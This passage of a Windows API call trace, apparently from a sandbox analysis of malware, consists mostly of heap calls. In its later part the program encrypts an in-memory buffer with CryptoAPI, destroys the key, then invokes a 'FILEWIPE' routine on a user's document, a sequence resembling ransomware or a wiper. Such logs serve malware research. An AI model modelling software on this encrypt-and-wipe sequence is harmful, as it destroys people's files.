lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0170.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.755] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0170.756] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0170.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0170.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0170.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0170.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0170.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0170.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.784] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x137a4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x137b0) returned 1 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0170.784] CharLowerBuffW (in: lpsz="byte[79793]", cchLength=0xb | out: lpsz="byte[79793]") returned 0xb [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0170.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0170.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0170.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0170.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0170.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0170.786] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0f898*, pdwDataLen=0x87e820*=0x137a4, dwBufLen=0x137b0 | out: pbData=0xa0f898*, pdwDataLen=0x87e820*=0x137b0) returned 1 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0170.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0170.788] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.806] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0170.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0170.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0170.806] CryptDestroyKey (hKey=0x90af98) returned 1 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.807] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.807] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.808] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0170.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.808] FreeLibrary (hLibModule=0x74f20000) returned 1 [0170.811] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0170.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFindFileData=0x87eda0 | out: 